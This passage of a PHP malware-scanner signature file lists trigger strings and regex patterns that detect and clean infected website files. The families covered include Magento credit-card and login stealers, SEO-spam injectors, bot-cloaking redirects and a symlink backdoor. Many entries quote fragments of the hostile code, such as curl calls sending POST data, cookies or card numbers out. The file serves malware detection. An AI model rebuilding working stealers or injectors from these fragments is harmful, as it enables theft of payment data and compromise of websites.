			'&fullpath=\'.urlencode($_SERVER[\'REQUEST_URI\']).\'&check=\'.isset($_GET[\'look\']).\'&ref=\'.urlencode($sReferer))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.182', '\/\/[\w\s]+\$sUserAgent = strtolower\(\$_SERVER..HTTP_USER_AGENT..\);[\s]*(\/\/[\w\s]+)?\$sReferer = ..;[\s]*if.isset.._SERVER[^:]+curl_init..http[^;]+&fullpath...urlencode.\$_SERVER..REQUEST_URI.....&check=..isset.._GET..look[^:]+http:[^}]+}[\s]*curl_setopt[^;]+;[\s]*\$sResult[^>]+echo \$sResult;[\s]*\/\/[\w\s]+'),
		),

		'.php\', false, $context);' => array(STR_TRIGGER,
			'die(\'ok' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.062', NULL),
		),
		
		'input type="text" name="packetsize"' => array(STR_CLEARFILE, 'php.hacktool.ddos.011.02', NULL),
		'function mycode($lnks_s, $lnks, $red_template, $ip)' => array(STR_CLEARFILE, 'php.spam-seo.generic.035', NULL),
		'PayPal_Validator' => array(STR_CLEARFILE, 'php.hacktool.paypal_validator.001', NULL),
		'if (!$allow || check_bot_ip($ip) || $agent ) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.044', NULL),
	),

	'$_SERVER[\'HTTP_USER_AGENT\']' => array(STR_TRIGGER,

		'if((get_gate_data())||(get_gate_data())||' => array(STR_TRIGGER,
			'echo "<div style=' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.040.02', 'echo "<div style=."visibility: hidden !important;.">\s*<.php\s*error_reporting.0.;\s*ini_set..display[^\$]+\$gate_list = array[^<\?]+\?action=[^\|<\?]+\|\|.get_gate_data[^\}]+\}(?:\s*<<<EOF\s*>\s*<div style=[^<]+<iframe[^<]+<.iframe><.div>\s*EOF;)?\s*\?>\s*<.div>";' ),
			'<div style="visibility: hidden !important;">' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.040', '<div style="visibility: hidden !important;">\s*<.php\s*error_reporting.0.;\s*ini_set..display[^\$]+\$gate_list = array[^<\?]+\?action=[^\|<\?]+\|\|.get_gate_data[^\}]+\}(?:\s*<<<EOF\s*>\s*<div style=[^<]+<iframe[^<]+<.iframe><.div>\s*EOF;)?\s*\?>\s*<.div><.div>'),
		),

		'$ua=$_SERVER[\'HTTP_USER_AGENT\'];' => array(STR_TRIGGER,
			'echo \'<div style="display: none;">' => array(STR_TRIGGER,
				'if (strrpos($ua, "Mobile") == true || strrpos($ua, "Google") == true ||' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.224', '\$ua=\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*if[\s]*\(strrpos\(\$ua, "Mobile"\) == true[^\}]+<a href=.http[^\}]+\}[\s]*elseif[\s]*\(strrpos\(\$[\w]+,[\s]*.[\w]+.\)[\s]*==[\s]*true[^\}]+;[\s]*\}'),
			),
		),

		'$fp = fopen(' => array(STR_TRIGGER,
			'$GLOBALS[\'ipRanges' => array(STR_TRIGGER,
				'if (!isBot($uAg,$ip)) echo "<a href=' => array(STR_CLEARFILE, 'php.malware.bot-check.001', NULL),
			),
		),

		'=$_SERVER[\'REQUEST_URI\']' => array(STR_TRIGGER,
			'echo $' => array(STR_TRIGGER,
				'&& !empty($ip) && !empty($useragent' => array(STR_CLEARFILE, 'php.spam-seo.hidden-links.005', NULL),
			),
		),

		'= <<<EOF' => array(STR_TRIGGER,
			'<div style="overflow:hidden;height:1px;">' => array(STR_TRIGGER,
				'$tmp = strtolower($_SERVER[\'HTTP_USER_AGENT\']);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.252', '\$tmp = strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if[\s]*\([\s]*strpos[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*<<<EOF[^}]+echo \$[\w]+;[\s]*\}'),
			),
		),

		'if(checkrobot()){' => array(STR_TRIGGER,
			'echo \'' => array(STR_CLEARFILE, 'php.spam-seo.injector.194', NULL),
		),

		'function CheckCVV($' => array(STR_TRIGGER,
			'if ( stripos($_SERVER[\'HTTP_USER_AGENT\'], $spider) !== false ) return true' => array(STR_CLEARFILE, 'php.phishing.block_bots.003', NULL),
		),

		'if(strstr($domain,\'google' => array(STR_TRIGGER,
			'(isCrawler()&&is_home()&&!is_paged())' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.094', 'function check_keyword\(\)[^>]+isCrawler\(\)&&is_home[^>]+header\(.Location[^}]+exit;[\s\}]+'),
		),

		'if (preg_match("#(google' => array(STR_TRIGGER,
			'header("Location: http://yandex.ru/yandsearch?lr=2&text=".rand(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.095', 'if\s*\(preg_match\([\'"]\#\(google\|[^\)]+\)\s*\#\w+[\'"]\s*,\s*\$_SERVER\[[\'"]HTTP_USER_AGENT[\'"]\]\s*\)\s*\)\s*{\s*header\([\'"]\s*HTTP\/[^\)]+\)\s*;\s*header\([\'"]\s*Location\s*:\s*https?:\/\/(?:\w+\.)?yandex\.ru\/yandsearch\?\w+=\w+\&text=[\'"]\.rand\([^;]+;\s*}\s*else\s*{\s*header\([\'"]\s*HTTP[^;]+;\s*header\([\'"]\s*Location\s*:[^;]+;\s*}\s*exit\s*;'),
		),

		'= substr(md5($_SERVER[\'QUERY_STRING\'])' => array(STR_TRIGGER,
			'document.write(\'<\'+' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.091.02', NULL),
		),

		')#i\',@$_SERVER[\'HTTP_REFERER\'])' => array(STR_TRIGGER,
			'if(!preg_match(\'/bot/\',@$_SERVER[\'HTTP_USER_AGENT\']) &&' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.135', 'if[\s]*\(!preg_match\(..bot..,[\s]*@\$_SERVER[^\}]+exit[^;]*;[\s]*\}'),
		),

        'preg_match(\'/bot|crawl|slurp|' => array(STR_TRIGGER,
            '<title>404 Not Found</title>' => array(STR_CLEARFILE, 'php.phishing.script.035', NULL),
        ),

		'strpos($useragent,"aol")||strpos($useragent' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.016', '\$useragent[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if\(\(strpos\(\$useragent,.bot.[^\{]+\{[^>]+else[\s]*\{[\s]*\}'),
		'if(preg_match(\'/\' . implode(\'|\', $uagents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.006', 'if\s*\(isset\(\$_GET\[.\w+.\]\)\s*\!==\s*false\)\s*{\s*\$content\s*=\s*\@\w+\(.http(s)?:[^\]]+\]\.[\'"]{2,}\);\s*\$\w+\s*=[^;]+;\s*\$\w+\s*=\s*array\([(\'\"\,\sbingbotslurpmsnbotaolyahoomsn)]+;\s*if\(preg_match\([\'"]\/[\'"]\s*\.\s*implode\(.\|.,\s*\$\w+\)\s*\.\s*.\/i.,\s*\$_SERVER\[.HTTP_USER_AGENT.\]\)\)\s*{\s*echo\s*\$\w+;[^;]+;\s*echo\s*[\'"]<script[^>]+>\s*document\.location\.href\s*=\s*[^<]+<.script>[\'"];\s*(\/\/echo\s*"<script[^>]+>[^>]+>";)?\s*}\s*}\s*else\s*{}'), 
		'$web_content = str_replace($content_url,' => array(STR_CLEARFILE, 'php.spam-seo.injector.108', NULL),
		'include($d_path.$files[2]);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.035', '\$currentpage = ._SERVER..REQUEST_URI..;\s*\$d_path = "[^\{]+?\{\s*case .pages.0.:\s*include[^\}]+?\}\s*.ip [^\}]+?\}\s*\}\s*\}[^;]+?;\s*if ..is_bot.:\s*switch[^\}]+\}\s*endif;'),
		'= "<b>Client type-</b> " . $' => array(STR_CLEARFILE, 'php.spam-seo.doorway_b9i9n9g.001.01', NULL),
		'sub_id_1=\'.strval(key($_' => array(STR_CLEARFILE, 'php.spam-seo.redirect.077', NULL),
		'@symlink(\'/home/\' . $user . \'/public_html/wp-config.php\', $user' => array(STR_CLEARFILE, 'php.backdoor.symlink-sa.005', NULL),
		'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){ ?>' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.011', '<\?php\s*if\s*\(preg_match\([\'"]\/[^\2]+googlebot[^\/]+\/i[\'"],\s*\$_SERVER\[.HTTP_USER_AGENT.\]\s*\)\s*\)\s*{\s*\?>[^\}]+\}[\s]*\?>'),
		'array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank"' => array(STR_CLEARFILE, 'php.phishing.block_bots.002.02', NULL),
		'if (preg_match(\'/google|yahoo' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.046', 'if[\s]*\(preg_match\(.\/google\|yahoo[^\$]+\$_SERVER\[.HTTP_USER_AGENT.\]\)\)\{echo[^:]+href=.http:\/\/[^;]+\;\}'),
		'sub_id_1=\'.strval(key($_' => array(STR_CLEARFILE, 'php.spam-seo.redirect.077', NULL),
		'logger("[BOT] {$_SERVER[\'REQUEST_URI\']} - 500");' => array(STR_CLEARFILE, 'php.phishing.block_bots.012', NULL),
	),

	'CURLOPT_URL' => array(STR_TRIGGER,

		'curl_init(' => array(STR_TRIGGER,

			'(isset($_POST[\'login' => array(STR_TRIGGER,
				'://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]' => array(STR_TRIGGER,
					'http_build_query($data)' => array(STR_TRIGGER,
						'curl_close($myCurl);' => array(STR_TRIGGER,
							'$_POST[\'login\'][\'password\'];' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.011', 'if[\s]*\(isset\(\$_POST\[.login.\]\)+[\s]*\{[\s]*\$data[\s]*=[\s]*array\(\);[\s]*\$data\[.email.\][\s]*=[\s]*\$_POST\[.login.\]\[.username.\];[^\(]+curl_init\(\);[\s]*curl_setopt\(\$myCurl[^}]+curl_close\(\$myCurl\);[\s]*\}'),
						),
					),
				),
			),

			'&site=\'.$_SERVER[\'HTTP_HOST' => array(STR_TRIGGER,
				'CURLOPT_URL,base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.096', 'if[\s]*\(\$this->request->post\[.[\w]+.\]\)[\s]*\{\$[\w]+[\s]*=[\s]*(\$this->request->post\[.[\w]+.\]..\|..)*\$_SERVER\[.HTTP_HOST.\];[\s]*mail\([^_]+curl_init\(\);[^\}]+curl_exec\(\$[\w]+\);curl_close\(\$[\w]+\);\}'),
			),

			'file_put_contents($_SERVER["\x44\x4f\x43\x55\x4d\x45\116\124\137\x52\x4f\117\124"]' => array(STR_TRIGGER,
				'preg_replace("\57\x3c\41\x2d\55' => array(STR_CLEARFILE, 'php.malware.injector.079', NULL),
			),

			'if ($flag==true) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.228', '\$flag[\s]*=[\s]*false;[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*if\(stripos\(\$[\w]+,[\s]*.[^{]+!==[\s]*false\)[\s]*\{[^<]+if[\s]*\(\$flag==true\)[\s]*\{[\s]*echo \$[\w]+;[\s]*}'),
			'echo \'Manager V1\';' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.020', NULL),
			'assword=".($data' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.009', '\$data[^;]+;\s*\$data\d[^\[]+\[.\w+.\];\s*\$[^_]+_SERVER\[[^;]+;\s*[^\(]+\(\$data\d\)\..&\w+=.\.\(\$data\d[^;]+;\s*\$url\s*=\s*.[htps]{4,}[^;]+;\s*\$ch\s*=\s*curl_init\(\);\s*(curl_setopt\(\$ch,\s*[^\)]+\);\s*)+[^=]+=\s*curl_exec\(\$ch\);\s*curl_close\(\$ch\);'),
			'curl_setopt($ch,CURLOPT_URL, str_rot13(\'uggcf://' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.073', 'if\s*\(preg_match\(.\/.\.base64_decode\([^\)]+\)\s*\.[\'"]\/i[\'"]\s*,\s*serialize\s*\(\$_POST\)\s*\)\s*\)\s*{\s*\$\w+\s*=\s*str_rot13\s*\(.onfr64_rapbqr.\)\s*;\s*\$\w+\s*=\s*str_rot13\s*\(.onfr64_qrpbqr.\)\s*;\s*[^\$]+\$ch\s*=\s*curl_init\(\)\s*;\s*curl_setopt\(\$ch\s*,\s*CURLOPT_URL\s*,\s*str_rot13\(.uggcf:\/\/[^\)]+\)\);\s*curl_setopt\([^}]+}'),
			'.$this->request->post[\'cc_number\']."|".$_SERVER[\'HTTP_HOST\'];$' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.086', '(\$\w+)\s*=\s*(\$\w+)\[.\w+.\]\s*\.\s*[\'"]\|[\'"]\s*\.\2\[[^;]+\.\$_SERVER\[.HTTP_HOST.\]\s*;\s*(\$\w+)\s*=\s*curl_init\(\)\s*;\s*curl_setopt\(\3[^;]+;\s*curl_setopt\(\3\s*,\s*CURLOPT_URL\s*,\s*base64_decode\([^\.]+\.urlencode\(\1\)\s*\.[\'"]\&\w+=[\'"]\s*\.\$_SERVER\[.HTTP_HOST.\]\)\s*;\s*curl_exec\(\3\)\s*;\s*curl_close\(\3\)\s*;'),
			'(strpos($botbotbot,"google' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.291', '\$[\w]+[\s]*=[\s]*.\.\.\..\.mb_strtolower\(\$_SERVER\[.?HTTP_USER_AGENT.?\]\);[\s]*\$[\w]+[\s]*=[\s]*str_replace\([^:]+http:\/\/\$[\w]+\.[\d]*\.[^\}]+echo[\s]*\$[\w]+;[\s]*\}'),
			'if(C_hrefing($htprefs) && isset($_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.320', 'error_reporting\([\d]+\);[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*!empty\(\$_GET\[.[\w]+.\]\)\?\$_GET\[.[\w]+.\]:.[\w]+.[\w]+.;[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\(\$[\w]+\);[^\}]+\}[\s]*return[\s]*\$[\w]+;[\s]*\}[\s]*\$[\w]+[\s]*=[^;]+;[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*str_replace\([^\}]+[\s]*\}[\s]*else[\s]*\{[\s]*return[\s]*false;[\s]*\}[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER[^\}]+\}[\s]*if\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[^\}]+echo[\s]*\$[\w]+;[\s]*exit\(\);[\s]*\}'),
			'preg_match("/^(?P<local>(?P<lang>[a-z]{1,8})([a-z0-9\\\\-_]+)?)/", strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"]),' => array(STR_CLEARFILE, 'php.malware.redirect.032', 'NULL'),
		),

		'header("Content-type:' => array(STR_TRIGGER,

			'echo curl_exec($' => array(STR_TRIGGER,
				'(string)$_SERVER[\'QUERY_STRING\']);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.217', 'header\(.Content-type:[^\)]+\);\s*(\$\w+)=[^;]+;[^\(]+\(\d+,\1\);[^;]+;\s*else\s*(\$\w+)[^;]+;[^=]+=\s*curl_init\(\);\s*[^,]+,\s*[^\$]+\2\s*\.\s*.\?.\s*\.\s*\(string\)\$\_SERVER\[.QUERY_STRING.\]\);\s*[^;]+;\s*[^;]+;\s*echo\s*curl\_exec\(\$\w+\);'),
			),

			'http://\'.$goweb.\'/index.php?' => array(STR_TRIGGER,
				'if(strpos($html_content,\'getcontent500page\') !== false)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.281', '@set_time_limit\([^;]+\);[\s]*@ignore_user_abort[^;]+;[\s]*\$goweb[\s]*=[^&]+&&[\s]*strcasecmp\(getenv\(.REMOTE_ADDR.\),[\s]*.unknown[^@]+@header\(.HTTP[^@]+@header[^@]+@file_get_contents\(\$url[^\}]+\}[\s]*return[\s]*\$file_contents;[\s]*\}'),
			),
		),

		'preg_match("/Location' => array(STR_TRIGGER,
			'\' . $x0b . \'?\' . $pars . \'ua=\' . \'&ip=\' . $bip . \'&srv=\' . base64_encode($_SERVER[\'SERVER_NAME\']);' => array(STR_CLEARFILE, 'php.malware.injector.037', NULL),
		),

		'$htmls =  str_replace("/skin/",$fromsite."skin/",$htmls);' => array(STR_TRIGGER,
			'$pagetitle = getCode($htmls,"/<title>(.*?)<\/title>/");' => array(STR_CLEARFILE, 'php.spam-seo.injector.202', NULL),
		),

		'function GetFileContent($url)' => array(STR_TRIGGER,
			'if($_SERVER[\'QUERY_STRING\']!="")' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector_gen.032', 'if\(\$_SERVER\[.QUERY_STRING.\]!=""\)[\s]*\{[^}]+\$[\w]+[\s]*=[\s]*GetFileContent[^%]+function GetFileContent\(\$[^%]+return \$file_contents;[\s]*\}'),
		),

		'gzinflate(substr(\'' => array(STR_TRIGGER,
			'$root.$GLOBALS{$_GET{' => array(STR_CLEARFILE, 'php.malware.generic.069', NULL),
		),

		'$url_string = \'http://\'.base64_decode($api_key2).\'/\'.$par.\'/\'.$id;' => array(STR_CLEARFILE, 'php.spam-seo.injector.114', NULL),
		'if(!empty($_COOKIE)){$co=\'\';foreach($_COOKIE as $cn => $cv){if($co)' => array(STR_CLEARFILE, 'php.spam-seo.doorway_fetcher.001', NULL),
		'$content = preg_replace("#<script(.*?)>([^<]*?)(analytics\.js|doubleclick\.net)([^<]*?)</script>#", " ", $content);' => array(STR_CLEARFILE, 'php.spam-seo.injector.203', NULL),
	),

	'aHR0' => array(STR_TRIGGER,

		'version' => array(STR_TRIGGER,
			'encode' => array(STR_TRIGGER,
				'serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"' => array(STR_CHAIN_TRIGGER,
					'serialize($_POST) . "--" . serialize($_COOKIE)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.069', 'exec\("curl --data ..version=1&encode="\.base64_encode\([\s]*serialize\(\$_POST\) \. "--" \. serialize\(\$_COOKIE\)[\s]*\)[\s]*\.[\s]*"&host="[\s]*\.\$_SERVER[^;]+\);'),
					')."/i", serialize($_POST)))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.069.02', 'if[\s]*\(preg_match\("."\.base64_decode\([^\.]+\)\.".i",[\s]*serialize\(\$_POST\)\)\)'),
				),
			),
		),

		'(\'frevnyvmr\');' => array(STR_TRIGGER,
			'"_", array("str' => array(STR_CHAIN_TRIGGER,
				'implode("_", array("str"' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.069.03', '\$[\w]+[\s]*=[\s]*implode\(._.,[\s]*array\([^>]+trim\(\$[\w]+\(.aHR0[^;]+\);[\s]*(curl_setopt[^\}]+curl_close\(\$[\w]+\);[\s]*\})?'),
				'ini_set(\'display_errors\', 0);' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.069.04', 'ini_set..display_errors., 0.;[\s]*(error_reporting\([^;]+;[\s]*)?'),
			),
		),
		
		'[\'password\'])."&url=".base64_encode' => array(STR_CHAIN_TRIGGER,
			'curl_setopt ($ch, CURLOPT_TIMEOUT, $time_out);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.login-stealer.007', 'function \w+\(\$\w+\).\{\s+\$\w+.=.\d+;\s+\$time_out.=[^}]*\}.else.\{\s+\$\w+.=.curl_init\(\);[^}]*\}\s+return.\$\w+;\s+\}'),
			'.="&p=".base64_encode($credentials[\'password\'])."&url=".base64_encode($_SERVER[\'HTTP_HOST\'])."&ip=".base64_encode($_SERVER["REMOTE_ADDR"]);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.login-stealer.007.02', 'if\(\$\w+\)\{\s+\$\w+=base64_decode\(\"\w+[^:]*::\w+\(\$\w+\);\s+\}'), 
		),

		'add_filter(' => array(STR_TRIGGER,
			'is_single() && ! is_user_logged_in() && ! is_feed() && ! stristr( $_SERVER[' => array(STR_CLEARFILE, 'php.spam-seo.link_injector.014', NULL),
		),
	),

	'$_SERVER[\'HTTP_REFERER\']' => array(STR_TRIGGER,

		'strtolower($r);foreach ($words as $word)' => array(STR_TRIGGER,
			'google\',\'msn\',\'baidu' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.010', '(\$\w+)\s*=\s*.[htps]{4,}:[^\?]+\?\w+=\w+[^;]+;(\$\w+)\s*=\s*array\s*\(.google.,.msn.,.baidu[^\)]+\);[^_]+_SERVER\[.HTTP_REFERER.\];[^;]+;\$\w+\s*=\s*strtolower\(\$\w+\);foreach\s*\(\2[^\{]+\{\s*if[^\{]+\{\s*header\(.[Ll]ocation:\s*..\1\);\s*exit;\s*\}\}'),
		),

		'301 Moved Permanently' => array(STR_TRIGGER,
			'if (strpos($_SERVER[\'REQUEST_URI\'], \'.html\') !== false)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.121', 'if[\s]*\(strpos\(\$_SERVER\[.REQUEST_URI.\],[\s]*..[\w]+.\)[\s]*!==[\s]*false\)[\s]*\{[\s]*header\(.HTTP\/[\d]*\.[\d]*[\s]*301[\s]*Moved[\s]*Permanently.\);[\s]*header\(.Location:[\s]*[^\}]+exit;[\s]*\}[\s]*\$referrer[\s]*=[\s]*\$_SERVER\[.HTTP_REFERER.\];[\s]*if\(preg_match\([^\}]+\][\s]*\([\w]+\|[\w]+\|[\w]+[^:]+header\(.Location:[\s]*[^;]+\);[\s]*exit;[\s]*\}'),
		),

		'google|bing|yandex' => array(STR_TRIGGER,
			'header("Location: http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.128', '\$[\w]+[\s]*=[\s]*(file_get_contents\()?.http[^;]+\)?;[\s]*\$[\w]+[\s]*=[^\|]+google\|bing\|yandex[^;]+;[\s]*if\(isset\(\$_SERVER\[.HTTP_REFERER.\]\)\)[\s]*\{\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_REFERER.\];[\s]*if[\s]*\(preg_match\([^\{]+\$[\w]+\)\)[\s]*\{[\s]*header\(.Location:[\s]*http[^;]+\);[\s]*\}[\s]*\}'),
		),

		'(strpos ($ref, \'google\') !==' => array(STR_TRIGGER,
			'header("location:' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.132', '\$[\w]+[\s]*=[\s]*.http[^;]+;[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_REFERER.\]\);[\s]*if[\s]*\(strpos[\s]*\(\$[\w]+,[\s]*.google.\)[^\{]+\{[\s]*header\(.location:[\s]*.\.\$[\w]+\);[\s]*exit;[\s]*\}'),
		),

		'if( parse_url($_SERVER[\'HTTP_REFERER\'])[\'host\'] == \'phishtank.com\'){' => array(STR_CLEARFILE, 'php.hacktool.phishtank_check.001', NULL),
	),

	'if(preg_match(' => array(STR_TRIGGER,
		'if(preg_match(chr(47).chr(103).chr(111).chr(111).chr(103).chr(108).chr(101).chr(124).' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.cmFuZA.001', '(<\?php\s*)?if\(preg_match\((chr\(\d{1,3}\)\.){30}[^\?]+(\$[Oo0]+)[^\}]+\)\s*\);\s*break;(\s*\}){3}(\?>)?'),
		'@base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.021', 'if\(preg_match\(..[^,]+,[\s]*\$_SERVER\[.REQUEST_URI.]\)\)[\s]*\{[\s]*@file_put_contents[^}]+FILE_APPEND\);[\s]*}'),
		',$_SERVER[HTTP_USER_AGENT])){echo "<a' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.232', 'if\(\!@\$(\w+)\)\s*\{if\(preg_match\(..alltheweb\|aol\|baidu[^,]+.\$_SERVER\[HTTP_USER_AGENT\]\)\)\{echo\s*.<a\s*href=.[htps]{4,}:[^\}]+}@\$\1=true;\}'),
		'echo GetMetodu("http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.278', 'function GetMetodu\(\$url\)[\s]*\{[^\}]+\}[\s]*\$agent[^\}]+exit\(\);[\s]*\}'),
	),

	'Mage::' => array(STR_TRIGGER,

		'base64_encode(json_encode($' => array(STR_TRIGGER,
			'FILE_APPEND);' => array(STR_CHAIN_TRIGGER,
				'file_put_contents($_SERVER["DOCUMENT_ROOT"]' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.055', 'try[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*Mage::[\w]+\([^\)]*\)->[\w]+\(\)[^;]+;[^\.]+file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT[^;]+FILE_APPEND\);([\s\}]+catch[\s]*\([eE]xception[^\{]+\{[\s]*\})?'),
				'substr_replace($date[\'cc_number\'],' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.055.03', '\$[\w]+[\s]*=[\s]*\'\';[\s]*\$[\w]+[\s]*=[\s]*[\d]+;[\s]*while[\s]*\(\$[\w]+--\)[\s]*\{[\s]*\$[\w]+[\s]*\.=[\s]*rand[^\}]+\}[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+;[\s]*\$[\w]+\[.cc_number.\][\s]*=[\s]*substr_replace\(\$[\w]+\[.cc_number[^;]+\);'),
			),
		),

		'base64_encode(utf8_encode(implode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.113', '(error_reporting\([\d]+\);)?[\s]*if[\s]*\(isset\(\$_POST\[.payment.\]\)[\s]*&&[\s]*isset\(\$_POST\[.[^\{]+cc_exp_year.\]\)[\s]*>[\s]*[\d]+\)[\s]*\{[^\}]+\}[\s]*\$[\w]+\[.cc_number.\][\s]*=[\s]*substr_replace\(\$[\w]+[^\|]+base64_encode\(utf8_encode\(implode\([^\}]+curl_exec\(\$[\w]+\);[\s]*curl_close\(\$[\w]+\);[\s]*\}'),
	),

	'$url = "$host/".$_SERVER["QUERY_STRING"];' => array(STR_TRIGGER,

		'function getContent($url,&$result,$proxystr=null){' => array(STR_TRIGGER,
			'$htmls =  str_replace("<a href=\"","<a href=\"$target?",$htmls);' => array(STR_CLEARFILE, 'php.spam-seo.injector.166', NULL),
		),

		'$htmls =  str_replace("".chr(34)."' => array(STR_CLEARFILE, 'php.backdoor.injector.104', NULL),
	),

	'$_SERVER[\'SERVER_NAME\']' => array(STR_TRIGGER,
		'$postLogin[\'password' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.012', '\$[\w]+[\s]*\.=[\s]*.[^_]+\$_SERVER\[.SERVER_NAME.\][^\[]+\$postLogin\[.username.\][^@]*mail\(.[\w]+@[^_]+\$_SERVER\[.SERVER_NAME.\],[\s]*\$[\w]+\);'),
		'echo "<p>domain: ".$_SERVER[\'SERVER_NAME\']." ".$v[\'user_login\']." ".$v[\'user_pass\']' => array(STR_CLEARFILE, 'php.hacktool.wp_users.012', NULL),
	),

	'$_SERVER[HTTP_ACCEPT_ENCODING] ==' => array(STR_TRIGGER,
		'", $_SERVER[HTTP_ACCEPT_CHARSET], $' => array(STR_TRIGGER,
			'" ? @preg_filter("' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pregreplace.020', '\$_SERVER\[HTTP_ACCEPT_ENCODING\] ==[\s]*.[\w]*.[\s]*\?[\s]*@preg_filter[^\$]+, \$_SERVER\[HTTP_ACCEPT_CHARSET\], \$[^;]+;'),
		),
	),

	'"\137\162\145\160\154\141\143\145";' => array(STR_TRIGGER,
		'\'/.*\';' => array(STR_TRIGGER,
			'\'/e\';' => array(STR_TRIGGER,
				'),\'\');' => array(STR_TRIGGER,
					'\';/*' => array(STR_TRIGGER,
						'($_SERVER[$' => array(STR_CLEARFILE, 'php.malware.obfuscated.014', NULL),
					),
				),
			),
		),
	),

	'$ips = isset($_SERVER[\'HTTP_CF_CONNECTING_IP' => array(STR_TRIGGER,
		'$bodys = array(\'u\' => $username,\'p\' => $password' => array(STR_TRIGGER,
			'$requests->request( $urls, array( \'method\' => \'POST' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.004', '\\$ips = isset.._SERVER..HTTP_CF_CONNECTING[^;]+;[\\s]*\\$bodys = array..u..=>[^;]+;[\\s]*\\$urls[^)]+\\$bodys\\)[\\s]*\\);'),
		),
	),

	'else header("Location:' => array(STR_TRIGGER,
		'$mykeys  = $_GET' => array(STR_TRIGGER,
			'if ((strpos($_SERVER["HTTP_REFERER"], "qdr:")) OR (strpos' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.078', '\$ref[\s]*=[\s]*\$_SERVER\[.HTTP_REFERER.\];[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*\$mykeys[\s]*=[\s]*\$_GET[^;]+;[\s]*function[\s]*getUrl\(\)[\s]*\{[^>]+\$mykeys[\s]*=[\s]*[\d]+;[\s]*else[\s]*header\(.Location:[^;]+\);[\s]*exit;[\s]*\}'),
		),
	),

	'str_replace(".html"' => array(STR_TRIGGER,
		'@strpos($_SERVER[' => array(STR_TRIGGER,
